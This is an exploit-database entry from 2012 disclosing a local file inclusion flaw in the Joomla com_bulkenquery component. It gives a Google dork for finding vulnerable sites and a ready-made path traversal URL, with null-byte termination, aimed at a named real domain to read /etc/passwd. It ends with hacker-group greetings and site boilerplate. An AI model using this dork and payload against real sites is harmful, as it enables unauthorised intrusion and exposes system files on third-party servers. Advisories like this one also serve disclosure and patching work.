Joomla Bulkenquery Local File Inclusion

2012.01.22
Credit: the_cyber_nuxbie
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98
Dork: inurl:\"/index.php?option=com_bulkenquery\"

[ Joomla Component com_bulkenquery LFI Vulnerability ] #[~] Author : the_cyber_nuxbie #[~] Home : www.thecybernuxbie.com #[~] E-mail : staff@thecybernuxbie.com #[~] Found : 20 January 2012 - 07:45 PM. #[~] Tested On : Windows 7 Ultimate. #[~] Google Dork : inurl:"/index.php?option=com_bulkenquery" [x] exploits: 0day no more... http://localhost/index.php?option=com_bulkenquery&controller=[LFI] - Example Exploits: 0day no more... http://videoconworld.com/index.php?option=com_bulkenquery&controller=../../../../../../../../../../../../../etc/passwd%00 - N0T35: 0day no more... "n0 d0rk f0r kiddi0t" Thanks To: All Indonesian Hackers, c0ders, attackers, bloggers, programmers, etc... - 20 January 2012, GMT +07:35, IT-Underground, Indonesia.

References:

http://www.thecybernuxbie.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top